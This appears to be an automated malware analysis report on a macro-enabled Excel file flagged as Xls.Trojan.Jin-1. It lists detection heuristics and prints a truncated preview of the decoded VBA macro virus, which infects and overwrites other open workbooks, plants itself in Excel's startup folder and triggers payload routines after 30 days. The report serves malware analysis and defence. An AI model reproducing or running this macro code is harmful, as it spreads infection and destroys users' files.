MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a macro-enabled Excel file identified by ClamAV as Xls.Trojan.Jin-1. The Auto_Open macro attempts to infect other open workbooks by copying its own sheets into them and overwriting the target file, effectively spreading the malicious content. The VBA code is designed to hide its presence and spread to other files.
Heuristics 3
-
ClamAV: Xls.Trojan.Jin-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Jin-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17134 bytes |
SHA-256: 45698aa6ec8dd3af70fd6a60e2f928190d4399eeb3c2ee02bafde1b9333b6b18 |
|||
|
Detection
ClamAV:
Xls.Trojan.Jini-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Dim infperiod As String
Sub auto_open()
'Application.DisplayStatusBar = False
Application.ScreenUpdating = False
'abc = MsgBox("AA", vbYesNo)
On Error Resume Next
'openworkbooks = Workbooks.Count
For Each w In Workbooks
If w.Name <> ActiveWorkbook.Name Then
nameis = w.Name
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = ActiveWorkbook.Name
tobeinfected = Workbooks(nameis).FullName
namesavetoreopen = Workbooks(infectedworkbook).FullName
totalworksheets = Workbooks(nameis).Worksheets.Count
totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
Application.DisplayAlerts = False
For Each ws In Worksheets
If ws.Name <> "shn" Then
ws.Delete
End If
Next ws
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
Workbooks(infectedworkbook).Sheets("shn").Visible = False
Workbooks(nameis).Close savechanges = False
Kill tobeinfected
Workbooks(infectedworkbook).SaveAs tobeinfected
Workbooks.Open namesavetoreopen
End If
End If
virustag = Empty
Next
xlstartpath = Application.StartupPath
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
infectedworkbook = ActiveWorkbook.Name
namesavetoreopen = Workbooks(infectedworkbook).FullName
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
Application.DisplayAlerts = False
For Each ws In Worksheets
If ws.Name <> "shn" Then
ws.Delete
End If
Next ws
Workbooks(infectedworkbook).Sheets("Shn").Range("B76").Value = Date
ActiveWindow.Visible = False
Workbooks(infectedworkbook).SaveAs xlstartpath & "\shn.xls"
'Application.EnableEvents = False
Workbooks.Open namesavetoreopen
'Windows("shn.xls").Close savechanges = True
'Application.EnableEvents = True
End If
shfstq
'Application.OnTime Now + TimeValue("00:00:30"), "check_files"
End Sub
Sub shfstq()
'abc = MsgBox("Checking files", vbYesNo)
Application.ScreenUpdating = False
On Error Resume Next
If IsError(aa = ActiveWorkbook.Name) = True Then
Else
showworkbook = ActiveWorkbook.Name
End If
'openworkbooks = Workbooks.Count
For Each w In Workbooks
If w.Name <> "shn.xls" Then
nameis = w.Name
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = "shn.xls"
tobeinfected = Workbooks(nameis).FullName
namesavetoreopen = Workbooks(infectedworkbook).FullName
totalworksheets = Workbooks(nameis).Worksheets.Count
'totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
Windows(infectedworkbook).Visible = True
Application.DisplayAlerts = False
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
Workbooks(infectedworkbook).Sheets("shn").Visible = False
Workbooks(nameis).Close savechanges = False
Kill tobeinfected
Workbooks(infectedworkbook).SaveAs tobeinfected
Workbooks.Open namesavetoreopen
Workbooks(showworkbook).Activate
End If
End If
virustag = Empty
Next
xlstartpath = Application.StartupPath
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
Workbooks("shn.xls").SaveAs xlstartpath & "\shn.xls"
End If
infperiod = Date - Workbooks("shn.xls").Sheets("shn").Range("B76").Value
If infperiod > 30 Then
Application.Run ("shn.xls!aista")
Application.Run ("shn.xls!payghamat")
End If
Application.OnTime Now + TimeValue("00:02:00"), "shn.xls!shfstq"
End Sub
Sub aista()
On Error Resume Next
Set mymenubar = CommandBars.ActiveMenuBar.Controls.Item(1)
'mymenubar.Delete
Set mymenubars = mymenubar.Controls.Item(1)
alread = mymenubars.Caption
If alread <> "Naya" Then
ST = 77
For changemenu = 1 To 12
Set mymenubars = mymenubar.Contr
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.